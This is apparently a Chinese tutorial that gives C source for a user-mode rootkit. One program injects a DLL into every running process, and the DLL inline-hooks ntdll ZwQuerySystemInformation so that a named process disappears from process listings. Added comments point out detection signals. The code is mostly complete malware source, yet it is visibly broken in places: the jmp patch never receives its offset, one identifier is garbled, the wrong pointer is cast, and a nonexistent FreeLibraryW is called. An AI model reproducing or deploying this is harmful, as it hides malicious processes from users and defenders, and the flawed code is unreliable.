0x01须知
需要技术:全局API勾取。
原理:进程是内核对象,通过相关API可以检测到他们,用户模式下检测API分为2类
CreateToolhelp32Snapshot()和EnumProcess()函数。但是2个API最终都会调用ntdll.ZwQuerySystemInformation()API
ZwQuerySystemInformation
(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
)
系统借助这个API可以获得运行中所有进程的信息(结构体),形成一个链表,操作该链表把进程信息从列表中删除即可隐藏相关进程。
需要解决的问题:每个进程监视的工具都需要钩取,每个新打开的进程监视工具也需要立即进行钩取。
实现思路:HideProc.exe负责将Stealth.dll文件注入到所有运行的进程,Stealth.dll负责钩取进程的ntdll.ZwQuerySystemInformation()API
0x02HideProc
InjectAllProcess()函数
#include"windows.h"
#include"tlhelp32.h"
BOOL InjectAllProcess(int nMode, LPCTSTR szDllPath)
{
    /* Walk every process in a Toolhelp snapshot and, per process, either
     * inject szDllPath (nMode == INJECTION_MODE) or eject it (any other
     * value). INJECTION_MODE, InjectDll and EjectDll are defined elsewhere
     * in the project.
     * Returns TRUE unconditionally: neither the snapshot handle nor the
     * Process32First result nor the per-process calls are checked.
     * Defender note: this is a fan-out — one process touching nearly every
     * other process in quick succession (see InjectDll for the per-target
     * call sequence). */
    DWORD dwPID = 0;
    HANDLE hSnapShot = INVALID_HANDLE_VALUE;
    PROCESSENTRY32 pe;
    // Take the system snapshot; dwSize must be set before Process32First.
    pe.dwSize = sizeof(PROCESSENTRY32);
    hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL);
    // Enumerate processes (return value unchecked).
    Process32First(hSnapShot, &pe);
    do
    {
        dwPID = pe.th32ProcessID;
        // Author's note: for system stability, low-numbered system
        // processes (PID < 100) are skipped. `continue` in a do/while
        // jumps to the Process32Next condition.
        if (dwPID < 100)
        {
            continue;
        }
        if (nMode == INJECTION_MODE)
            InjectDll(dwPID, szDllPath);
        else
            EjectDll(dwPID, szDllPath);
    } while (Process32Next(hSnapShot, &pe));
    CloseHandle(hSnapShot);
    return TRUE;
}
负责获取系统快照,然后逐个进程注入。
注入函数
BOOL InjectDll(DWORD dwPID, LPCTSTR szDllPath)  // inject a DLL
{
    /* Remote-thread injection: open the target, allocate a buffer in it,
     * copy the DLL path there, and start a thread in the target at
     * kernel32!LoadLibraryW with that buffer as its argument.
     * The sequence OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx ->
     * WriteProcessMemory -> CreateRemoteThread is the textbook pattern that
     * endpoint monitoring commonly keys on.
     * Returns FALSE only when OpenProcess fails; every later call is
     * unchecked and the function returns TRUE regardless. hThread is never
     * closed and pRemoteBuf is never freed in the target. */
    HANDLE hProcess = NULL, hThread = NULL;
    HMODULE hMod = NULL;
    LPVOID pRemoteBuf = NULL;
    // Byte size of the path including its terminator.
    DWORD dwBufSize = (DWORD)(_tcslen(szDllPath) + 1)*sizeof(TCHAR);
    LPTHREAD_START_ROUTINE pThreadProc;
    // Open the target process by PID with full access.
    if (!(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID)))
    {
        _tprintf(L"OpenProcess(%d) failed!!![%d]\n", dwPID, GetLastError());
        return FALSE;
    }
    // Commit dwBufSize bytes of read/write memory in the target.
    pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize, MEM_COMMIT, PAGE_READWRITE);
    // Write the DLL path into that buffer (the original comment still names
    // "myhack.dll", presumably left over from another example).
    WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)szDllPath, dwBufSize, NULL);
    // Resolve LoadLibraryW in this process; the address is then used in the
    // target, which presumably relies on kernel32 sharing one base address
    // across same-bitness processes — not verified here.
    hMod = GetModuleHandle(L"Kernel32.dll");  // handle of an already-loaded module
    pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(hMod, "LoadLibraryW");  // function address
    // Run LoadLibraryW(pRemoteBuf) on a new thread inside the target.
    hThread = CreateRemoteThread(hProcess, NULL, 0, pThreadProc, pRemoteBuf, 0, NULL);  // create the remote thread
    _tprintf(L"%d", GetLastError());  // debug output: last error after CreateRemoteThread
    // Block until the remote LoadLibraryW thread finishes (hThread may be NULL).
    WaitForSingleObject(hThread, INFINITE);
    CloseHandle(hProcess);
    printf("Inject : %d", GetLastError());  // debug output
    return TRUE;
}
还需要提升权限
BOOL SetPrivilege(LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
{
    /* Enable (bEnablePrivilege != 0) or disable the named privilege on the
     * current process token. Author's note: HideProc.exe must first raise
     * its own privilege (SE_DEBUG_NAME, see _tmain) to obtain a complete
     * process list and open the corresponding processes.
     * Returns TRUE when AdjustTokenPrivileges succeeds without reporting
     * ERROR_NOT_ALL_ASSIGNED, FALSE otherwise. hToken is never closed on
     * any path.
     * Defender note: enabling SeDebugPrivilege on a token is an auditable
     * action under Windows token/privilege auditing. */
    TOKEN_PRIVILEGES tp;
    HANDLE hToken;
    LUID luid;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
    {
        // (message text says LookupPrivilegeValue, but this is the
        // OpenProcessToken failure path)
        _tprintf(L"LookupPrivilegeValue error: %u\n", GetLastError());
        return FALSE;
    }
    // Translate the privilege name into its LUID on the local system.
    if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid))
    {
        _tprintf(L"LookupPrivilegeValue error: %u\n", GetLastError());
        return FALSE;
    }
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = luid;
    if (bEnablePrivilege)
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    else
        tp.Privileges[0].Attributes = 0;
    // Enable the privilege, or (Attributes == 0) disable it.
    if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
    {
        _tprintf(L"AdjustTokenPrivileges error: %u\n", GetLastError());
        return FALSE;
    }
    // AdjustTokenPrivileges can return success while still reporting
    // ERROR_NOT_ALL_ASSIGNED through GetLastError when the token does not
    // hold the privilege at all.
    if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
    {
        _tprintf(L"the token does nothave rhe specified privilege %d .\n",GetLastError());
        return FALSE;
    }
    printf("TQ %d", GetLastError());  // debug output
    return TRUE;
}
卸载dll
BOOL EjectDll(DWORD dwPID, LPCTSTR szDllPath)
{
    /* Mirror of InjectDll intended to unload the DLL from the target.
     * Unlike InjectDll, an OpenProcess failure only prints a message and
     * execution continues with hProcess == NULL; the remaining calls are
     * unchecked and TRUE is returned regardless. hThread is never closed.
     * NOTE(review): as far as I know kernel32 exports FreeLibrary (which
     * takes an HMODULE), not a "FreeLibraryW" variant, and pRemoteBuf holds
     * a path string rather than a module handle — verify that this path
     * actually unloads anything. */
    HANDLE hProcess = NULL, hThread = NULL;
    HMODULE hMod = NULL;
    LPVOID pRemoteBuf = NULL;
    // Byte size of the path including its terminator.
    DWORD dwBufSize = (DWORD)(_tcslen(szDllPath) + 1)*sizeof(TCHAR);
    LPTHREAD_START_ROUTINE pThreadProc;
    if (!(hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPID)))
    {
        // No early return here: the code below runs with a NULL handle.
        _tprintf(L"OpenProcess(%d) failed!!![%d]\n", dwPID, GetLastError());
    }
    // Same allocate/write sequence as InjectDll.
    pRemoteBuf = VirtualAllocEx(hProcess, NULL, dwBufSize, MEM_COMMIT, PAGE_READWRITE);
    WriteProcessMemory(hProcess, pRemoteBuf, (LPVOID)szDllPath, dwBufSize, NULL);
    hMod = GetModuleHandle(L"Kernel32.dll");
    pThreadProc = (LPTHREAD_START_ROUTINE)GetProcAddress(hMod, "FreeLibraryW");
    hThread = CreateRemoteThread(hProcess, NULL, 0, pThreadProc, pRemoteBuf, 0, NULL);
    _tprintf(L"%d", GetLastError());  // debug output
    // No wait on hThread here, unlike InjectDll.
    CloseHandle(hProcess);
    return TRUE;
}
还有一个main
int _tmain(int argc, TCHAR* argv[])
{
    /* Usage: HideProc.exe <-hide|-show> <Process name> <dll path>
     * 1. enable SE_DEBUG_NAME on this process (SetPrivilege);
     * 2. load the DLL into *this* process and call its exported SetProcName
     *    so the target name is stored in the DLL's shared data section;
     * 3. inject ("-hide", the default) or eject ("-show") the DLL in every
     *    process via InjectAllProcess.
     * PFN_SetProcName, INJECTION_MODE and EJECTION_MODE are declared
     * elsewhere in the project. The LoadLibrary and GetProcAddress results
     * are not checked before SetProcName is called through the pointer.
     * Because LoadLibrary runs the DLL's DllMain in HideProc as well, the
     * hook is also installed here unless DllMain excludes this process
     * (its self-check is commented out in the listing below). */
    int nMode = INJECTION_MODE;
    HMODULE hLib = NULL;
    PFN_SetProcName SetProcName = NULL;
    if (argc != 4)
    {
        printf("\n Usage : HideProc.exe <-hide|-show> <Process name> <dll path>\n\n");
        return 1;
    }
    SetPrivilege(SE_DEBUG_NAME, TRUE);  // return value ignored
    // Load the DLL locally to reach its SetProcName export.
    hLib = LoadLibrary(argv[3]);
    SetProcName = (PFN_SetProcName)GetProcAddress(hLib, "SetProcName");
    SetProcName(argv[2]);
    // Anything other than "-show" (case-insensitive) means inject.
    if (!_tcsicmp(argv[1], L"-show"))
        nMode = EJECTION_MODE;
    InjectAllProcess(nMode, argv[3]);
    FreeLibrary(hLib);
    return 0;
}
//调用dll导出函数的方法:LoadLibrary --> GetProcAddress(获取导出函数的地址) --> 调用导出函数
//使用一个函数的地址调用一个函数方法:定义:typedef void(*PFN_SetProcName)(LPCTSTR szProcName); 实体化:PFN_SetProcName SetProcName = NULL; 调用:SetProcName(argv[2]);
dll实现
#include"windows.h"
#include"tlhelp32.h"
#include "tchar.h"
#include "stdio.h"
#define STATUS_SUCCESS (0x00000000L)
// NTSTATUS is declared locally rather than pulled in from winternl.h.
typedef LONG NTSTATUS;
// Subset of SYSTEM_INFORMATION_CLASS with explicit numeric values; the hook
// below only acts on SystemProcessInformation (5).
typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemBasicInformation = 0,
    SystemPerformanceInformation = 2,
    SystemTimeOfDayInformation = 3,
    SystemProcessInformation = 5,
    SystemProcessorPerformanceInformation = 8,
    SystemInterruptInformation = 23,
    SystemExceptionInformation = 33,
    SystemRegistryQuotaInformation = 37,
    SystemLookasideInformation = 45
} SYSTEM_INFORMATION_CLASS;
// Author's note: these records describe every running process and are
// chained inside one contiguous buffer — NextEntryOffset is the byte
// distance to the next record, 0 marks the last one. The layout mirrors the
// public "Reserved" declaration; the hook treats Reserved2[1] as the
// image-name string pointer (author's claim, see NewZwQuerySystemInformation).
typedef struct _SYSTEM_PROCESS_INFORMATION {
    ULONG NextEntryOffset;
    ULONG NumberOfThreads;
    BYTE Reserved1[48];
    PVOID Reserved2[3];
    HANDLE UniqueProcessId;
    PVOID Reserved3;
    ULONG HandleCount;
    BYTE Reserved4[4];
    PVOID Reserved5[11];
    SIZE_T PeakPagefileUsage;
    SIZE_T PrivatePageCount;
    LARGE_INTEGER Reserved6[6];
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;
// Signature of ntdll!ZwQuerySystemInformation, used to call the original
// through the raw address returned by GetProcAddress.
typedef NTSTATUS(WINAPI *PFZWQUERYSYSTEMINFORMATION)
    (SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength);
#define DEF_NTDLL ("ntdll.dll")
#define DEF_ZWQUERYSYSTEMINFORMATION ("ZwQuerySystemInformation")
// Backup of the 5 bytes hook_by_code overwrites; per-process, not shared.
BYTE g_pOrgBytes[5] = { 0 };
// Global variable placed in a shared section: the linker directive marks
// .SHARE read/write/shared, so every process that maps this DLL sees the
// same g_szProcName (written once by HideProc through SetProcName).
// Defender note: a writable+shared section is unusual for an ordinary DLL
// and is a cheap static indicator.
#pragma comment(linker,"/SECTION:.SHARE,RWS")
#pragma data_seg(".SHARE")
TCHAR g_szProcName[MAX_PATH] = { 0 };
#pragma data_seg()
//export function
#ifdef __cplusplus
extern "C"{
#endif
// Exported so HideProc can store the name of the process to hide in the
// shared section (g_szProcName). _tcscpy_s with the array argument uses the
// buffer's declared size (MAX_PATH); longer input triggers the CRT's
// invalid-parameter handling rather than an overflow.
__declspec(dllexport) void SetProcName(LPCTSTR szProcName)
{
    _tcscpy_s(g_szProcName, szProcName);
}
#ifdef __cplusplus
}
#endif
//包含要钩取API的dll模块文件名称 , 要钩取的API名称 , 用户提供的钩取函数地址 , 存储原来的5字节缓冲区
// Parameters: module name containing the API to hook, the API name, the
// caller's replacement function, and a caller-provided buffer (>= 5 bytes)
// that receives the original first 5 bytes.
BOOL hook_by_code(LPCSTR szDllName, LPCSTR szFuncName, PROC pfnNew, PBYTE pOrgBytes)
{
    /* Inline ("code") hook: overwrite the first 5 bytes of
     * szDllName!szFuncName in this process with a jmp rel32 template,
     * saving the original bytes into pOrgBytes for unhook_by_code.
     * Returns FALSE if the first byte is already 0xE9 (taken to mean
     * "already hooked"), TRUE otherwise. GetProcAddress and VirtualProtect
     * results are not checked. Addresses are handled as DWORD, i.e. a
     * 32-bit process is assumed.
     * Defender note: afterwards the in-memory prologue of the export differs
     * from the on-disk ntdll image, and the page was transiently made
     * PAGE_EXECUTE_READWRITE — both are standard integrity-check signals. */
    FARPROC pfnOrg;
    DWORD dwOldProtect, dwAddress;
    byte pBuf[5] = { 0xE9, 0, };  // patch template: E9 = jmp rel32
    PBYTE pByte;
    // Resolve the API to hook: function szFuncName of module szDllName.
    pfnOrg = (FARPROC)GetProcAddress(GetModuleHandleA(szDllName), szFuncName);
    pByte = (PBYTE)pfnOrg;
    // Already starts with a jmp (0xE9): treat as hooked and return FALSE.
    if (pByte[0] == 0xE9)
    {
        return FALSE;
    }
    // Make the 5 bytes writable.
    VirtualProtect((LPVOID)pfnOrg, 5, PAGE_EXECUTE_READWRITE, &dwOldProtect);
    // Back up the original code.
    memcpy(pOrgBytes, pfnOrg, 5);
    // jmp displacement (E9 XXXXXXXX):
    // XXXXXXXX = target address - address of this instruction - 5 (its length).
    // (The original comment attributes the subtraction to little-endian
    // storage; it is simply the rel32 formula.)
    dwAddress = (DWORD)pfnNew - (DWORD)pfnOrg - 5;
    // Write the 5-byte patch over the prologue.
    memcpy(pfnOrg, pBuf, 5);
    // Restore the previous page protection.
    VirtualProtect((LPVOID)pfnOrg, 5, dwOldProtect, &dwOldProtect);
    return TRUE;
}
//获取函数要修改函数地址 --> 计算jmp偏移 --> 更改权限 --> 保存,写入数据 --> 更改权限
//所谓钩取,在要钩取的函数的开始几个字节改成jmp指令跳转到注入的dll中执行设计好的函数
//
BOOL unhook_by_code(LPCSTR szDllName, LPCSTR szFuncName, PBYTE pOrgBytes)
{
    /* Reverse of hook_by_code: copy the 5 saved bytes in pOrgBytes back
     * over the prologue of szDllName!szFuncName.
     * Returns FALSE if the first byte is not 0xE9 (taken to mean "not
     * hooked"), TRUE otherwise. GetProcAddress and VirtualProtect results
     * are not checked; dwAddress is declared but unused. */
    FARPROC pfnOrg;
    DWORD dwOldProtect, dwAddress;
    byte pBuf[5] = { 0xE9, 0, };
    PBYTE pByte;
    // Resolve the API to unhook: function szFuncName of module szDllName.
    pfnOrg = (FARPROC)GetProcAddress(GetModuleHandleA(szDllName), szFuncName);
    pByte = (PBYTE)pfnOrg;
    // Not currently starting with a jmp (0xE9): nothing to undo.
    if (pByte[0] != 0xE9)
    {
        return FALSE;
    }
    // Make the 5 bytes writable.
    VirtualProtect((LPVOID)pfnOrg, 5, PAGE_EXECUTE_READWRITE, &dwOldProtect);
    // Restore the original code.
    memcpy(pfnOrg, pOrgBytes, 5);
    // Read the bytes back into pBuf (pBuf is not used afterwards).
    memcpy(pBuf, pfnOrg, 5);
    // Restore the previous page protection.
    VirtualProtect((LPVOID)pfnOrg, 5, dwOldProtect, &dwOldProtect);
    return TRUE;
}
//所谓unhook就是把原本模块对应函数出修改的jmp指令还原为原本的指令
NTSTATUS WINAPI NewZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength)
{
    /* Replacement installed over ntdll!ZwQuerySystemInformation by
     * hook_by_code. On every call it removes the hook, calls the real API,
     * and — for SystemProcessInformation only — walks the returned records
     * and unlinks the one whose image name matches g_szProcName by adjusting
     * the previous record's NextEntryOffset; the hook is re-installed before
     * returning. The real API's status is returned unchanged.
     * Defender note: the prologue flips between patched and original around
     * each call, so a single in-memory comparison against the on-disk image
     * can miss it — repeat the check or compare with the process suspended.
     * Only the answer seen by user-mode callers in hooked processes is
     * altered; a cross-view comparison (kernel-side enumeration versus this
     * API's output) exposes the gap. */
    NTSTATUS status;
    FARPROC pFunc;
    PSYSTEM_PROCESS_INFORMATION pCur, pPrev;
    char szProcName[MAX_PATH] = { 0, };  // declared but unused
    // Remove the hook first so the real function can run.
    unhook_by_code(DEF_NTDLL, DEF_ZWQUERYSYSTEMINFORMATION, g_pOrgBytes);
    // Call the original API.
    // NOTE(review): "Syst emInformationClass" looks like a transcription
    // artefact of the parameter name — confirm against the source.
    pFunc = GetProcAddress(GetModuleHandleA(DEF_NTDLL), DEF_ZWQUERYSYSTEMINFORMATION);
    status = ((PFZWQUERYSYSTEMINFORMATION)pFunc)(Syst emInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
    if (status != STATUS_SUCCESS)
        goto __NIQUERYSYSTEMINFORMATION_ENND;
    // Only SystemProcessInformation queries are filtered.
    if (SystemInformationClass == SystemProcessInformation)
    {
        // Author's note: cast to SYSTEM_PROCESS_INFORMATION; pCur is the
        // head of the singly linked list.
        pCur = (PSYSTEM_PROCESS_INFORMATION)SystemProcessInformation;
        while (TRUE)
        {
            // Compare the process name; g_szProcName is the name to hide.
            // Records with no name pointer are skipped and do not update pPrev.
            if (pCur->Reserved2[1] != NULL)
            {
                if (!_tcsicmp((PWSTR)pCur->Reserved2[1], g_szProcName))  // author: Reserved2[1] holds the process name
                {
                    // Unlink this record: make the previous record skip it.
                    if (pCur->NextEntryOffset == 0)
                        pPrev->NextEntryOffset = 0;
                    else
                        pPrev->NextEntryOffset += pCur->NextEntryOffset;  // must be +=: offsets accumulate past the skipped record
                }
                else
                    pPrev = pCur;
            }
            if (pCur->NextEntryOffset == 0)
                break;
            // Advance by the byte offset (arithmetic done in ULONG — 32-bit assumption).
            pCur = (PSYSTEM_PROCESS_INFORMATION)((ULONG)pCur + pCur->NextEntryOffset);
        }
    }
__NIQUERYSYSTEMINFORMATION_ENND:
    // Re-install the hook before returning so the next call is intercepted.
    hook_by_code(DEF_NTDLL, DEF_ZWQUERYSYSTEMINFORMATION, (PROC)NewZwQuerySystemInformation, g_pOrgBytes);
    return status;
}
BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD fdwReason, LPVOID lpvRserved)
{
    /* Installs the ZwQuerySystemInformation hook when the DLL is mapped
     * (i.e. inside the remote LoadLibraryW thread started by InjectDll, and
     * also in HideProc itself, which loads the DLL to call SetProcName) and
     * removes it on detach. Always returns TRUE. */
    char szCurProc[MAX_PATH] = { 0, };
    char *p = NULL;
    // Intended exclusion: if the current process is HideProc.exe, do nothing.
    // The file name is computed but the check itself is commented out, so
    // p is effectively unused.
    GetModuleFileNameA(NULL, szCurProc, MAX_PATH);
    p = strrchr(szCurProc, '\\');  // locate the file name component
    //if ((p != NULL) && !_stricmp(p + 1, "HideProc.exe"))
    //return TRUE;
    switch (fdwReason)
    {
    // Install the API hook: redirect DEF_NTDLL!DEF_ZWQUERYSYSTEMINFORMATION
    // to NewZwQuerySystemInformation, saving the original bytes in g_pOrgBytes.
    case DLL_PROCESS_ATTACH:
        hook_by_code(DEF_NTDLL, DEF_ZWQUERYSYSTEMINFORMATION, (PROC)NewZwQuerySystemInformation, g_pOrgBytes);
        break;
    // Remove the hook.
    case DLL_PROCESS_DETACH:
        unhook_by_code(DEF_NTDLL, DEF_ZWQUERYSYSTEMINFORMATION, g_pOrgBytes);
        break;
    }
    return TRUE;
}
win10测试不通过,很不稳定,暂时不知道什么原因。